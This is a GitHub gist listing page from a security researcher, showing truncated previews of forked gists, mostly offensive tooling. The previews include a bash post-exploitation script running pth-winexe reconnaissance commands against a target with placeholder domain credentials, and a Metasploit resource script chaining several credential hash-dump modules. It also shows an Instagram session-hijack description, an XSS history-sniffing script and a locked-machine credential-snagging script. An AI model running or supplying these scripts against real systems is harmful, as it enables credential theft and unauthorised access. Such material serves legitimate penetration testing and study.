jakuta-tech / usefulShit.md

Last active May 31, 2017 15:25

collection of interesting projects, websites, documents & articles, most realated to information security

#Sections

jakuta-tech / gist:18196a09f50abe678a32

Last active February 21, 2025 15:06

Instagram iOS session hijack

Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.

Steps to reproduce (on Mac OS X):

jakuta-tech / scanners.md

Last active June 21, 2018 00:27 — forked from jonatanrdsantos/scanners.md

List of pententing scanners

jakuta-tech / README.md

Created May 7, 2016 03:04 — forked from magnetikonline/README.md

IE 7/8/9/10/11 Virtual machines from Microsoft - Linux w/VirtualBox installation notes.

IE 7/8/9/10/11 Virtual machines from Microsoft

Linux installation notes (tested under Ubuntu 14.04LTS/12.04LTS), assuming VirtualBox is already installed on host.

jakuta-tech / gmail.py

Created May 23, 2016 03:48 — forked from ib-lundgren/gmail.py

How to fetch emails from GMail using an OAuth 2 Bearer token and GMails SASL XOAuth2 mechanism.

	"""Fetching the latest GMail email using OAuth 2 and IMAP.

	Requires requests-oauthlib, which is available on pypi.

	Includes a basic SASL XOAUTH2 authentication method for imaplib.
	"""
	# Credentials you get from registering a new web application in Google API Console
	client_id = 'your-id.apps.googleusercontent.com'
	client_secret = 'your secret'
	redirect_uri = 'your callback uri'

jakuta-tech / windows-post-exploitation.sh

Created June 15, 2016 22:33 — forked from 1N3/windows-post-exploitation.sh

A Windows post exploitation shell script

	#!/bin/bash
	TARGET=$1
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"

jakuta-tech / metasploit-post-exploitation-script-for-windows.rc

Created June 15, 2016 22:33 — forked from 1N3/metasploit-post-exploitation-script-for-windows.rc

Metasploit Post Exploitation Script For Windows

	setg SESSION 1
	use post/windows/gather/smart_hashdump
	run
	use post/windows/gather/credentials/domain_hashdump
	run
	use post/windows/gather/credentials/mcafee_vse_hashdump
	run
	use post/windows/gather/credentials/mssql_local_hashdump
	run
	use post/windows/gather/hashdump

jakuta-tech / index.js

Created June 15, 2016 22:36 — forked from 1N3/index.js

Remotely Sniffing Browser History via XSS Using HSTS + CSP

	/**
	* @fileoverview This file loads a bunch of HSTS domains and times how long it
	* takes for them to be redirected from HTTP to HTTPS. Based on that, it
	* decides whether the domain is a previously-noted HSTS domain or not.
	* @author yan <[email protected]>
	* @license MIT
	* @version 0.2.0
	*/

	// Timing in milliseconds above which a network request probably occurred.

jakuta-tech / mubix-lock.sh

Created October 8, 2016 04:51 — forked from binkybear/mubix-lock.sh

mubix-lock.sh

	#!/bin/bash
	#
	# Attack created by Mubix. For more information see:
	# https://room362.com/post/2016/snagging-creds-from-locked-machines
	# Modified for Nethunter by Binkybear
	#

	# ================== #
	# Check for root
	# ================== #

jakuta-tech / gist:61aafcc084e423bc58da274b29b37d42

Created November 6, 2016 21:14 — forked from cdown/gist:1163649

Bash urlencode and urldecode